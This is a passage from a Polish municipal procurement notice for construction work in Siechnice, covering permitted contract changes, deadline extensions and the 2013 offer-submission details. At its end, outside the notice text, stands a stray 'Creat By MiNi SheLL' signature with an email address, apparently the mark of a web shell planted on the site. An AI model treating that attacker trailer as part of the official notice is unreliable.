w trakcie realizacji zadania a będzie niezbędny do właściwego zakończenia podstawowego zamówienia.
9.Zamawiający dopuszcza możliwość zmiany podwykonawców: w przypadku wprowadzenia
podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany
wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na
powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot.
wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę.
10.Zamawiający dopuszcza możliwość zmiany koordynatora na pisemną prośbę Wykonawcy lub
Zamawiającego. Po otrzymaniu pisemnej prośby dot. zmiany koordynatora określonego w umowie, w
terminie 14 dni od przekazania, Zamawiający może wyrazić zgodę na powyższe. 11.Zmiany na skutek
wydanych decyzji, uzgodnień, faktycznych uwarunkowań terenowych i gruntowych, powodujących
konieczność modyfikacji rozwiązań. 12.Innych sytuacji, których nie można było przewidzieć w chwili
zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do kwestii, które
podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie wszczęcia
procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości podmiotów
zainteresowanych tą procedurą. 13. Zamawiający dopuszcza zmianę terminu realizacji umowy lub
poszczególnych jej części (zleceń) o czas trwania poniższych okoliczności, w przypadku: 1)wystąpienia
okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w
Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności, 2)
konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności
dostosowania zakresu zadania do wytycznych programowych, powszechnie obowiązujących przepisów
prawa, wprowadzenia zmian w rozwiązaniach technicznych lub usunięcia wad w dostarczonej
dokumentacji projektowej, 3)nie przekazania przez Zamawiającego terenu budowy w terminie określonym
w umowie, 4)przerwy w robotach spowodowanej wystąpieniem znalezisk archeologicznych lub innych
znalezisk czy wykopalisk, uniemożliwiających wykonywanie robót, 5)wstrzymania przez Zamawiającego
wykonywanie robót, 6)działania siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 7)opóźnień
związanych z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane
dokumentów lub 8)innych okoliczności nie powstałych z winy Wykonawcy lub 9)wystąpienia robót
dodatkowych, nie objętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania,
których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli: a)z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia
podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub b)wykonanie zamówienia
podstawowego jest uzależnione od wykonania zamówienia dodatkowego, a wykonanie zamówienia
dodatkowego uniemożliwia wykonanie zamówienia podstawowego a wykonanie zamówienia dodatkowego
uniemożliwia wykonanie zamówienia podstawowego w terminie umownym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com